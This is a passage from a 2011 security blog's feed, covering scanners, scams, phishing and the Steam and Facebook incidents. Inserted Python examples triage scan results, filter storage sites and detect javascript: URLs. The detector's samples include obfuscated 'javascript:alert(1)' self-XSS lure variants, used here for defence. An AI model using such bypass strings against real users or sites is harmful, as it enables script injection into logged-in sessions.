 and patches and updates that should be there but aren’t.&lt;br /&gt;
&lt;br /&gt;
They 
also have several plus factors. They can be used to do a “pre-scan” 
scan, for example, to determine what devices and systems there are on 
the network. There’s nothing so vulnerable as something no-one knew was 
there in the first place, and it’s surprising how often those turn up in
 large and sprawling enterprises.&lt;br /&gt;
&lt;br /&gt;
Many scanners can also be set 
to scan the network after patches have been installed to make sure they 
do what they are supposed to do. What vulnerability scanners can’t do is
 the kind of active blocking defense carried out by such things as 
firewalls, intrusion prevention systems and anti-malware products 
though, by working in combination with them, vulnerability scanners can 
make what they do more accurate and precise.&lt;br /&gt;
&lt;br /&gt;
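The "Interpreting the Results" advice in Part 2 (the entry above this one in the feed) and the post-patch rescan described in the Patch Patrol section just above, as one added example that comes from neither post nor from any scanner vendor: it re-ranks constructed scanner findings by host context (exposure, sensitive data, compensating controls) and diffs two scan runs to confirm a remediation. The weights, host names and check names are assumptions of the example.

```python
"""
Triage scanner output with the context the two Predispose posts call for:
re-rank findings by exposure and compensating controls ("Interpreting the
Results" in Part 2), and diff two scan runs to confirm a patch did what it
should ("Patch Patrol" in Part 1).  Added example for these posts, not any
vendor's tool; the findings and host context are constructed.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Finding:
    host: str
    check: str        # scanner check name (constructed)
    severity: str     # vendor severity: critical / high / medium / low
    port: int = 0
    service: str = ""


@dataclass
class HostContext:
    """What the scanner cannot see on its own: the human context Beaver describes."""
    internet_facing: bool = False
    holds_sensitive_data: bool = False
    controls: set = field(default_factory=set)          # e.g. {"waf"}
    firewalled_ports: set = field(default_factory=set)  # unreachable from untrusted nets


VENDOR_SCORE = {"critical": 9.0, "high": 7.0, "medium": 4.0, "low": 1.0}


def contextual_score(f: Finding, ctx: HostContext) -> float:
    """Vendor score adjusted for the host's real exposure.  The weights are
    this example's assumptions, not a standard scoring scheme."""
    score = VENDOR_SCORE[f.severity]
    if f.port in ctx.firewalled_ports:
        score *= 0.2          # only reachable from a trusted segment
    if f.service == "http" and "waf" in ctx.controls:
        score *= 0.5          # compensating control in front of the web app
    if ctx.internet_facing:
        score += 2.0
    if ctx.holds_sensitive_data:
        score += 1.0
    return round(min(score, 10.0), 1)


def prioritise(findings, contexts):
    """Findings paired with their contextual score, highest first.  Hosts with
    no recorded context keep the vendor's own ranking."""
    ranked = [(contextual_score(f, contexts.get(f.host, HostContext())), f)
              for f in findings]
    ranked.sort(key=lambda pair: pair[0], reverse=True)
    return ranked


def remediation_key(f: Finding):
    return (f.host, f.check, f.port)


def verify_remediation(before, after):
    """Compare two runs over the same scope after patching: returns the findings
    that disappeared and the ones still present, keyed by (host, check, port)."""
    before_keys = {remediation_key(f) for f in before}
    after_keys = {remediation_key(f) for f in after}
    return sorted(before_keys - after_keys), sorted(after_keys)


# --- constructed sample data --------------------------------------------------
SAMPLE_FINDINGS = [
    Finding("db01", "outdated-openssl", "high", 443, "http"),   # admin UI, internal only
    Finding("web01", "sql-injection-login", "high", 443, "http"),
    Finding("web01", "directory-listing", "low", 443, "http"),
    Finding("kiosk07", "smb-signing-disabled", "medium", 445, "smb"),
]
SAMPLE_CONTEXT = {
    "web01": HostContext(internet_facing=True, holds_sensitive_data=True, controls={"waf"}),
    "db01": HostContext(holds_sensitive_data=True, firewalled_ports={443}),
}
# Re-scan after db01's OpenSSL was patched: that finding should be gone.
AFTER_PATCH = [f for f in SAMPLE_FINDINGS if f.check != "outdated-openssl"]


if __name__ == "__main__":
    for score, f in prioritise(SAMPLE_FINDINGS, SAMPLE_CONTEXT):
        print(f"{score:4.1f}  {f.host:8s} {f.check:22s} (vendor: {f.severity})")
    fixed, remaining = verify_remediation(SAMPLE_FINDINGS, AFTER_PATCH)
    print("fixed:", fixed)
    print("still open:", len(remaining))
```

Note how the vendor's "high" on the firewalled db01 host drops below the "medium" on the unmanaged kiosk once context is applied, which is exactly the re-reading of scanner output the posts argue for.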
Please continue your reading with the second part, above. &lt;br /&gt;
&lt;br /&gt;
*: Ethical Hackers or White Hat Hackers are people who are indeed hackers but put their abilities to good use (e.g. helping other companies).&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/8116542860715709039/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/predispose-your-security-risks-part-1.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8116542860715709039?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8116542860715709039?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/VQsq5Q9CHBQ/predispose-your-security-risks-part-1.html" title="Predispose Your Security Risks Part 1" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-RsKHj-YyO3s/TtVnw7qWanI/AAAAAAAAAAg/U0My6RypWeY/s72-c/security_taxonomy_small.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/predispose-your-security-risks-part-1.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ck8CSX4yfyp7ImA9WhRRFE4.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-5785490143785997616</id><published>2011-11-27T17:10:00.001Z</published><updated>2011-11-27T21:54:28.097Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T21:54:28.097Z</app:edited><title>Google Goes After Impersonator Scammers</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;

&lt;b&gt;As huge corporations go, Google's a pretty cuddly one, but according 
to the search giant itself, everyone should be careful about offers of 
employment or wealth that involve its name.  "Google Money" scammers 
represent a growing problem that the company is trying to combat.&lt;/b&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 350px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align="center"&gt;&lt;img alt="Google Goes After Impersonator Scammers" border="0" class="irImage" height="200" src="http://images.ientrymail.com/securitypronews/google_after_impersonator_scammers.jpg" title="Google Goes After Impersonator Scammers" width="336" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="right" class="caption" style="padding-bottom: 10px; padding-left: 45px; padding-right: 45px;"&gt;Google Goes After Impersonator Scammers&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="center" class="caption" style="padding-bottom: 0px;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
A post on the &lt;a href="http://googleblog.blogspot.com/2009/12/fighting-fraud-online-taking-google.html"&gt;Official Google Blog&lt;/a&gt;
 announced today, "[D]espite hundreds of consumer complaints and our own
 efforts to keep these sites from tricking people, some scams continue. 
 To fight back, we're working to stop various fraudulent 'Google Money' 
schemes, and this week filed suit against Pacific WebWorks and several 
other unnamed defendants."
&lt;br /&gt;
&lt;br /&gt;
The post then added, "[W]e're still working constantly to remove
 scammy URLs from our index, and we'll permanently disable AdWords 
accounts that provide a poor or harmful user experience, whether or not 
they use Google's trademarks illegally."
&lt;br /&gt;
&lt;br /&gt;
The problem continues to exist, though.
&lt;br /&gt;
&lt;br /&gt;
So fair warning: The scams are known to operate under names like
 the Earn Google Cash Kit, Google Adwork, Google ATM, Google Biz Kit, 
Google Cash, Google Fortune, Google Marketing Kit, Google Profits, 
Google StartUp Kit, Google Works, and the Home Business Kit for Google. 
 From there, they tend to be fairly standard make-money-from-home 
affairs.
&lt;br /&gt;
&lt;br /&gt;
As always, stay sharp.
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-5785490143785997616?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/OUlWhR1qaRQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/5785490143785997616/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/google-goes-after-impersonator-scammers.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5785490143785997616?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5785490143785997616?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/OUlWhR1qaRQ/google-goes-after-impersonator-scammers.html" title="Google Goes After Impersonator Scammers" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/google-goes-after-impersonator-scammers.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUACQ3wyfCp7ImA9WhRRFEw.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-2471847057061133729</id><published>2011-11-27T17:08:00.001Z</published><updated>2011-11-27T17:09:22.294Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T17:09:22.294Z</app:edited><title>Facebook Becomes A Favorite Target Of Phishers</title><content 
type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;b&gt;Due to widespread concerns about its attitude toward users' privacy, 
Facebook has been under all sorts of fire lately, facing criticism from 
U.S. senators, European data protection authorities, and many tech 
experts.  Now, yet another problem's cropped up, as Facebook's been 
called a top target of phishers.&lt;/b&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 350px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align="center"&gt;&lt;img alt="Facebook Becomes A Favorite Target Of Phishers" border="0" class="irImage" height="200" src="http://images.ientrymail.com/securitypronews/facebook_becomes_favorite_target.jpg" title="Facebook Becomes A Favorite Target Of Phishers" width="336" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="right" class="caption" style="padding-bottom: 10px; padding-left: 45px; padding-right: 45px;"&gt;Facebook Becomes A Favorite Target Of Phishers&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="center" class="caption" style="padding-bottom: 0px;"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;The Securelist division of Kaspersky Lab issued a &lt;a href="http://www.securelist.com/en/analysis/204792117/Spam_evolution_January_March_2010"&gt;report&lt;/a&gt;
 yesterday, and the identities of the top three organizations that have 
been targeted by phishers may not come as a surprise to anyone; they're 
PayPal (with 52.2 percent of all attacks aimed at it), eBay (with 13.3 
percent), and HSBC (with 7.8 percent).
&lt;br /&gt;&lt;br /&gt;The report, which covered the period between January and March 
of this year, next stated, though, "Facebook popped up unexpectedly in 
fourth place. This was the first time since we started monitoring that 
attacks on a social networking site have been so prolific."
&lt;br /&gt;&lt;br /&gt;By way of explanation, the report then continued, "Having stolen
 users' accounts, the fraudsters can then use them to distribute spam, 
sending bulk emails to the account owners and their friends in the 
network.  This method of distributing spam allows huge audiences to be 
reached.  Additionally, it lets the fraudsters take advantage of the 
social networking sites' additional options, like being able to send 
different requests, links to photos and invitations, all with the 
advertisement attached, both within the network and to users' inboxes."
&lt;br /&gt;&lt;br /&gt;Obviously, this isn't good news for Facebook's users or the 
security community as a whole.  Facebook acts as a sort of point of 
entry to information about a whole lot of people (the social network had
 400 million users in early February).
&lt;br /&gt;&lt;br /&gt;This isn't good news for Facebook, either, though - nothing that
 makes its users uncomfortable or unhappy, and therefore likely to 
leave, is - so perhaps we'll at least see the company make some 
attempt(s) to address this problem.
&lt;br /&gt;&lt;br /&gt;Anyway, if you're curious, the list of phishers' targets picked 
up after Facebook with Google, the IRS, Rapidshare, Bank of America, 
UBI, and Bradesco.
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-2471847057061133729?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/0cRv916gJB8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/2471847057061133729/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/facebook-becomes-favorite-target-of.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/2471847057061133729?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/2471847057061133729?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/0cRv916gJB8/facebook-becomes-favorite-target-of.html" title="Facebook Becomes A Favorite Target Of Phishers" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/facebook-becomes-favorite-target-of.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIBQHw9eCp7ImA9WhRRFEw.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-1554286147345456186</id><published>2011-11-27T17:05:00.001Z</published><updated>2011-11-27T17:05:51.260Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T17:05:51.260Z</app:edited><title>Online Game Service Steam Gets Hacked!</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;b&gt;Valve Corporation, maker of popular game series such as 
Half-Life, Team Fortress and Portal, had its video game on-demand 
service Steam hacked on November 6th. An outrageous 35 million users 
may have had their personal information compromised in the attack, 
although it is not yet known whether all of those records were actually 
taken. According to the BBC, "The attackers used login details from the 
forum hack to access a database that held ID and credit card data", 
which could now be used for any number of purposes. Valve issued a 
statement letting users know the extent of the situation:&lt;/b&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 350px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align="center"&gt;&lt;img alt="Online Game Service Steam Gets Hacked!" border="0" class="irImage" height="200" src="http://images.ientrymail.com/securitypronews/game_service_steam_hacked.jpg" title="Online Game Service Steam Gets Hacked!" width="336" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="right" class="caption" style="padding-bottom: 10px; padding-left: 45px; padding-right: 45px;"&gt;Online Game Service Steam Gets Hacked!&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="center" class="caption" style="padding-bottom: 0px;"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;blockquote&gt;
&lt;em&gt;"We learned that intruders obtained access to a 
Steam database in addition to the forums. This database contained  
information including user names, hashed and salted passwords, game 
purchases, email addresses, billing addresses  and encrypted credit card
 information. We do not have evidence that encrypted credit card numbers
 or personally  identifying information were taken by the intruders, or 
that the protection on credit card numbers or passwords was  cracked. We
 are still investigating."&lt;/em&gt;&lt;/blockquote&gt;
&lt;br /&gt;Adding this as well:
&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;
&lt;em&gt;"We don't have evidence of credit card misuse at
 this time. Nonetheless you should watch your credit card activity  and 
statements closely."&lt;/em&gt;&lt;/blockquote&gt;
&lt;br /&gt;They alerted customers that they will have to change their forum 
passwords the next time they log in, and suggested that they change 
their Steam passwords (which are apparently separate) as well. This is not a 
great time for this to happen to Steam, as many high profile titles such
 as Modern Warfare 3 and The Elder Scrolls: Skyrim, have come out this 
week, and this may make users a bit more wary about using the service 
now and in the future.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-1554286147345456186?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/U0IJP-nLb-g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/1554286147345456186/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/online-game-service-steam-gets-hacked.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1554286147345456186?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1554286147345456186?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/U0IJP-nLb-g/online-game-service-steam-gets-hacked.html" title="Online Game Service Steam Gets Hacked!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/online-game-service-steam-gets-hacked.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUQNQHg_eyp7ImA9WhRRFEw.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-9051374048509907234</id><published>2011-11-27T17:02:00.001Z</published><updated>2011-11-27T17:03:11.643Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T17:03:11.643Z</app:edited><title>Facebook Gets Hacked!</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;b&gt;Recently Facebook, headed up by billionaire entrepreneur Mark 
Zuckerberg, was hacked and violent, pornographic photos were posted on 
millions of users' profiles.&lt;/b&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 350px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align="center"&gt;&lt;img alt="Facebook Gets Hacked!" border="0" class="irImage" height="200" src="http://images.ientrymail.com/securitypronews/facebook_gets_hacked.jpg" title="Facebook Gets Hacked!" width="336" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="right" class="caption" style="padding-bottom: 10px; padding-left: 45px; padding-right: 45px;"&gt;Facebook Gets Hacked!&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td align="center" class="caption" style="padding-bottom: 0px;"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;Apparently, this attack did not actually compromise any user data, 
but that does not mean it wasn't serious. With over 800 million active 
users, Facebook is responsible for protecting a lot of personal data. 
Currently, the company is blaming the attack on a flaw in certain 
browsers. Users were tricked by the hacker(s) into pasting malicious 
JavaScript code into their address bars. Code run that way executes 
with the privileges of the page that is already open, so while a victim 
was logged in it could act on their profile as them, which is what 
granted the hacker(s) access.  
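&lt;br /&gt;&lt;br /&gt;The following is an added example, not code from the original post or from Facebook. It shows why a naive test for a pasted "javascript:" URL is not enough: modern browsers, following the WHATWG URL Standard, trim leading and trailing spaces and control characters, drop any tab or newline anywhere in the input, and compare the scheme case-insensitively, so a lure can write the scheme as "JavaScript:" or with a tab inside it and the browser still runs it. The function names and the sample strings are assumptions made for the example.

```python
"""Added example: classify pasted text the way a browser's address bar would.

Self-XSS lures ask the victim to paste text into the address bar.  Whatever
the text looks like, the browser applies the WHATWG URL Standard's
normalization before deciding which scheme it is, and a 'javascript:' URL
then runs in the origin of the page already open (the logged-in session).
"""
import re

# Tab, LF and CR are removed from the whole input before parsing.
_STRIP_ANYWHERE = str.maketrans("", "", "\t\n\r")
# Leading/trailing C0 controls (U+0000..U+001F) and U+0020 are trimmed.
_TRIM = "".join(chr(c) for c in range(0x21))
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def normalize_url_input(text):
    """Apply the address-bar normalization steps to raw pasted text."""
    return text.strip(_TRIM).translate(_STRIP_ANYWHERE)


def naive_is_javascript(text):
    """The check a hurried developer might write.  Easily bypassed."""
    return text.startswith("javascript:")


def url_scheme(text):
    """Return the lowercase scheme of the normalized input, or None."""
    match = _SCHEME_RE.match(normalize_url_input(text))
    if match is None:
        return None
    return match.group(1).lower()


def is_javascript_url(text):
    """Robust check: True if the browser would treat this as javascript:."""
    return url_scheme(text) == "javascript"


# Constructed lure strings (assumptions, not real payloads); the code after
# the scheme is deliberately inert.
SAMPLE_LURES = [
    "javascript:alert(1)",
    "JavaScript:alert(1)",
    "  javascript:alert(1)",
    "java\tscript:alert(1)",
    "\x01javascript:alert(1)",
]

SAMPLE_BENIGN = [
    "https://www.facebook.com/",
    "facebook.com/some/page",
    "javascript is fun",
]


def classify(strings):
    """Map each string to (naive_verdict, robust_verdict) for comparison."""
    return {s: (naive_is_javascript(s), is_javascript_url(s)) for s in strings}


if __name__ == "__main__":
    for text, (naive, robust) in classify(SAMPLE_LURES + SAMPLE_BENIGN).items():
        print(repr(text), "naive:", naive, "robust:", robust)
```

Only the first lure is caught by the naive check; the robust one catches all five and leaves the benign strings alone. The same normalization applies to links a site accepts from users, which is the more common place to need it.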
&lt;br /&gt;&lt;br /&gt;Obviously the people at Facebook aren't just sitting around not doing anything about this. According to a &lt;a href="http://global.christianpost.com/news/facebook-hacked-researchers-test-social-networks-security-62031/"&gt;spokesperson&lt;/a&gt;
 for the company, "Protecting the people who use Facebook from spam and 
malicious content is a top priority for us, and we are always working to
 improve our systems to isolate and remove material that violates our 
terms," which is somewhat relieving. However, many are still surprised 
and upset that this happened in the first place. 
&lt;br /&gt;&lt;br /&gt;What the public needs to understand is that Facebook is not the only major company out there that has been &lt;a href="http://www.washingtonpost.com/business/economy/when-hackers-attack/2011/06/09/AGJMEBOH_gallery.html"&gt;hacked&lt;/a&gt;
 recently. Sony, Valve, Google, Lockheed Martin, and others have all 
been victim to major attacks in the past few months. Facebook is trying 
their best to control the situation and is advising its members not to 
enter anything into their address bar that they don't know is safe.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-9051374048509907234?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/VOXIMWJsdhY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/9051374048509907234/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/facebook-gets-hacked.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/9051374048509907234?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/9051374048509907234?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/VOXIMWJsdhY/facebook-gets-hacked.html" title="Facebook Gets Hacked!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/facebook-gets-hacked.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUACRHs7fSp7ImA9WhRRFE0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-6783461681090087289</id><published>2011-11-27T14:21:00.001Z</published><updated>2011-11-27T14:22:45.505Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T14:22:45.505Z</app:edited><title>Security Manager's Journal: Sensitive company data gets released into the wild</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="source"&gt;Computerworld -&lt;/span&gt; If you don't think it's a 
big challenge to protect sensitive company information and intellectual 
property, listen to this story.&lt;br /&gt;
&lt;br /&gt;
Last week, one of our sales associates visited a customer to review 
the road map for one of our flagship products. This discussion was to be
 confidential, so you can imagine the sales associate's consternation 
when the customer said he had already viewed the presentation on the 
Web.   
   
&lt;br /&gt;

  He simply searched &lt;a href="http://www.slideshare.net/" target="new"&gt;SlideShare.net&lt;/a&gt;,
 an online community for sharing presentations, and found ours. Access 
wasn't restricted (though restricting it is an option), so he was able 
to download it and have a look -- ignoring the "Restricted Use Only" 
label slapped across it.&lt;br /&gt;
&lt;br /&gt;
The uproar that this situation created reached me quickly, and I was asked to remove the file from SlideShare.&lt;br /&gt;
&lt;br /&gt;

  One difficulty with that request was that only the user who uploaded 
the file could remove it, and that user had uploaded it anonymously, so I
 couldn't just send him an email and tell him to take it down. I might 
have been able to get his attention by blogging about the problem, but 
then we would've been advertising our misstep to the public. I contacted
 SlideShare and asked that the file be removed, but like most social 
media and file-sharing sites, it wouldn't act on a request from a third 
party, even though that third party was the security
 guy at the company that created the presentation. That left legal 
action as our last resort; our legal department filed a request through 
the Digital Millennium Copyright Act.   
   
&lt;br /&gt;

  Because I am a security guy, this turn of events didn't come as a 
great surprise. Things like this are inevitable in an era of 
proliferating social media and cloud-based data sharing and storage. 
I've denied several requests to use the cloud to store corporate data -- I'm not satisfied with the security these services offer -- but reports generated from our firewall show widespread use of these technologies.  
   
&lt;br /&gt;

  &lt;h3&gt;
Two options  &lt;/h3&gt;
This event, as well as other situations that arise because it's so 
easy for users to move things to the cloud on their own, can be handled 
internally in two ways: administratively and technologically.   
   
&lt;br /&gt;

  Administratively, I suggested that the vice president of sales tell 
his team that whoever uploaded the file must remove it, because it put 
the organization at risk. I also suggested that our vice president of 
marketing and public affairs or our legal counsel send a stern message 
to the entire workforce, stressing the importance of obtaining approval 
from marketing or public affairs before releasing any nonpublic data to 
the Internet. Luckily, I've already included these scenarios in a 
mandatory security awareness training module I recently released.  
   
&lt;br /&gt;

  Technologically, I don't have much to work with, given our current 
budget and resource constraints, but I will enable URL content filtering
 rules on our new Palo Alto Networks firewalls to block access to any 
personal storage sites, with appropriate exceptions. I know that doing 
this will have a business impact, since certain departments use these 
sites to disseminate training materials and marketing and sales 
information to the public. It will take quite a bit of time to minimize 
the business impact.   
   
&lt;br /&gt;
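An added example of the kind of rule described above, written in Python rather than any firewall vendor's syntax (it is not the column's own configuration): a blocked list of personal storage domains, an allow list of exceptions for the departments that publish through those sites, and the host-matching details (label boundaries, userinfo in the URL, letter case, trailing dots) that a hand-written filter tends to get wrong. The domain names, groups and paths are assumptions.

```python
"""Added example: evaluate a URL-filtering policy that blocks personal
storage / file-sharing sites but carves out exceptions for the teams that
publish through them.  Not firewall syntax; all names are made up.
"""
from urllib.parse import urlsplit

# Constructed policy (assumption).  In production the blocked domains would
# come from the firewall's category feed rather than a hand-kept table.
BLOCKED_DOMAINS = {
    "slideshare.net": "personal-storage",
    "dropbox.com": "personal-storage",
    "docs.google.com": "personal-storage",
}

# Exceptions: a domain, the path prefix the team owns, and the groups allowed.
EXCEPTIONS = [
    {"name": "marketing-publishing", "domain": "slideshare.net",
     "path_prefix": "/acmecorp/", "groups": {"marketing", "public-affairs"}},
    {"name": "training-materials", "domain": "docs.google.com",
     "path_prefix": "/presentation/", "groups": {"training"}},
]


def hostname_of(url):
    """Canonical hostname: lowercase, no userinfo, no port, no trailing dot.

    urlsplit().hostname already discards 'user:pass@' and ':port', which is
    what keeps http://slideshare.net@evil.example/ from matching slideshare.
    """
    host = urlsplit(url).hostname
    if not host:
        return None
    return host.lower().rstrip(".")


def domain_matches(host, domain):
    """True if host is domain or a subdomain of it (label boundary, not substring)."""
    return host == domain or host.endswith("." + domain)


def blocked_category(host):
    """Return the category that blocks host, or None."""
    for domain, category in BLOCKED_DOMAINS.items():
        if domain_matches(host, domain):
            return category
    return None


def matching_exception(host, path, user_groups):
    """Return the first exception covering this host/path for these groups."""
    for exc in EXCEPTIONS:
        if not domain_matches(host, exc["domain"]):
            continue
        if not path.startswith(exc["path_prefix"]):
            continue
        if exc["groups"].isdisjoint(user_groups):
            continue
        return exc
    return None


def evaluate(url, user_groups=()):
    """Decide allow/block for one request; returns (verdict, reason)."""
    host = hostname_of(url)
    if host is None:
        return ("block", "unparseable host")
    category = blocked_category(host)
    if category is None:
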